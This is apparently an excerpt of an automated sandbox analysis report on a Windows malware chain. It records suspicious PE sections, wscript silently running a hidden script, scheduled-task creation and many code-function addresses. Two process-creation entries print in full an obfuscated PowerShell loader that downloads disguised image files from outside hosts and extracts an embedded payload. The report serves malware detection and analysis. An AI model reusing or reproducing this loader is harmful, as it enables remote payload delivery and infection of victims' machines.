memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_41371306-d

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: 4b3b305d14.exe.6.dr	Static PE information: section name:
Source: 4b3b305d14.exe.6.dr	Static PE information: section name: .idata
Source: 4b3b305d14.exe.6.dr	Static PE information: section name:
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name:
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name: .idata
Source: 77c6b3ca0a.exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: dfd80aba08.exe.6.dr	Static PE information: section name:
Source: dfd80aba08.exe.6.dr	Static PE information: section name: .idata
Source: dfd80aba08.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: ae70ca0159.exe.6.dr	Static PE information: section name:
Source: ae70ca0159.exe.6.dr	Static PE information: section name: .idata
Source: ae70ca0159.exe.6.dr	Static PE information: section name:
Source: f3f4cac77b.exe.6.dr	Static PE information: section name:
Source: f3f4cac77b.exe.6.dr	Static PE information: section name: .idata
Source: f3f4cac77b.exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name:
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name: .idata
Source: 5a4a47dccd.exe.6.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name:
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name: .idata
Source: loqVSeJ[1].exe.6.dr	Static PE information: section name:
Source: loqVSeJ.exe.6.dr	Static PE information: section name:
Source: loqVSeJ.exe.6.dr	Static PE information: section name: .idata
Source: loqVSeJ.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE[1].exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: Bjkm5hE.exe.6.dr	Static PE information: section name: .idata
Source: Bjkm5hE.exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name: .idata
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name:
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name: .idata
Source: 7fOMOTQ.exe.6.dr	Static PE information: section name:
Source: random[4].exe0.6.dr	Static PE information: section name:
Source: random[4].exe0.6.dr	Static PE information: section name: .idata
Source: random[4].exe0.6.dr	Static PE information: section name:
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name:
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name: .idata
Source: 6ebe63e8d0.exe.6.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name: .idata
Source: Fe36XBk[1].exe.6.dr	Static PE information: section name:
Source: Fe36XBk.exe.6.dr	Static PE information: section name:
Source: Fe36XBk.exe.6.dr	Static PE information: section name: .idata
Source: Fe36XBk.exe.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name:
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name: .idata
Source: 8b3fbc1053.exe.6.dr	Static PE information: section name:
Source: random[3].exe0.6.dr	Static PE information: section name:
Source: random[3].exe0.6.dr	Static PE information: section name: .idata
Source: random[3].exe0.6.dr	Static PE information: section name:
Source: 318ea12e54.exe.6.dr	Static PE information: section name:
Source: 318ea12e54.exe.6.dr	Static PE information: section name: .idata
Source: 318ea12e54.exe.6.dr	Static PE information: section name:
Source: random[2].exe2.6.dr	Static PE information: section name:
Source: random[2].exe2.6.dr	Static PE information: section name: .idata
Source: random[2].exe2.6.dr	Static PE information: section name:
Source: 7251e9a205.exe.6.dr	Static PE information: section name:
Source: 7251e9a205.exe.6.dr	Static PE information: section name: .idata
Source: 7251e9a205.exe.6.dr	Static PE information: section name:
Source: random[3].exe1.6.dr	Static PE information: section name:
Source: random[3].exe1.6.dr	Static PE information: section name: .idata
Source: 85abde4902.exe.6.dr	Static PE information: section name:
Source: 85abde4902.exe.6.dr	Static PE information: section name: .idata

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@C

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

9_2_004038AF

Source: C:\Users\user\Desktop\random.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	File created: C:\Windows\SchedulesAb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	File created: C:\Windows\ContainsBefore	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	File created: C:\Windows\TokenDetroit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	File created: C:\Windows\AttacksContacted	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_0040737E	9_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_00406EFE	9_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_004079A2	9_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: 9_2_004049A8	9_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 21_2_02C60C38	21_2_02C60C38
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 21_2_02C609A1	21_2_02C609A1
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 21_2_02C609B0	21_2_02C609B0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 21_2_02C60C28	21_2_02C60C28
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042C0C0	23_2_0042C0C0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004380CD	23_2_004380CD
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004258B0	23_2_004258B0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043E150	23_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00412159	23_2_00412159
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004321AB	23_2_004321AB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040BA60	23_2_0040BA60
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00419A00	23_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00446220	23_2_00446220
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00441310	23_2_00441310
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004293EE	23_2_004293EE
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043DE00	23_2_0043DE00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004456F0	23_2_004456F0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004436B9	23_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00401040	23_2_00401040
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00410845	23_2_00410845
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00410050	23_2_00410050
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040E830	23_2_0040E830
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00412830	23_2_00412830
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042D831	23_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043B8D2	23_2_0043B8D2
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004378E7	23_2_004378E7
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004220F0	23_2_004220F0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004278B4	23_2_004278B4
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041A8BA	23_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043C0BF	23_2_0043C0BF
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00426150	23_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00436960	23_2_00436960
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00429970	23_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042B175	23_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041F100	23_2_0041F100
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040C920	23_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00433930	23_2_00433930
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040B980	23_2_0040B980
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00408A40	23_2_00408A40
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040A240	23_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042026A	23_2_0042026A
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004452C0	23_2_004452C0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00402AD0	23_2_00402AD0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004152F4	23_2_004152F4
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00435A86	23_2_00435A86
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00415A8F	23_2_00415A8F
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00432A8D	23_2_00432A8D
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00421A90	23_2_00421A90
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00423AB0	23_2_00423AB0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00420AB0	23_2_00420AB0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043DAB0	23_2_0043DAB0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043EB40	23_2_0043EB40
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00421350	23_2_00421350
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00438B00	23_2_00438B00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00445B00	23_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00432B2C	23_2_00432B2C
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040E380	23_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00412B90	23_2_00412B90
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00441BA0	23_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444C40	23_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00409460	23_2_00409460
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00418C20	23_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040C4C0	23_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042C4D0	23_2_0042C4D0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004424D0	23_2_004424D0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004324E1	23_2_004324E1
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004034F0	23_2_004034F0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042C4F0	23_2_0042C4F0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041BCF6	23_2_0041BCF6
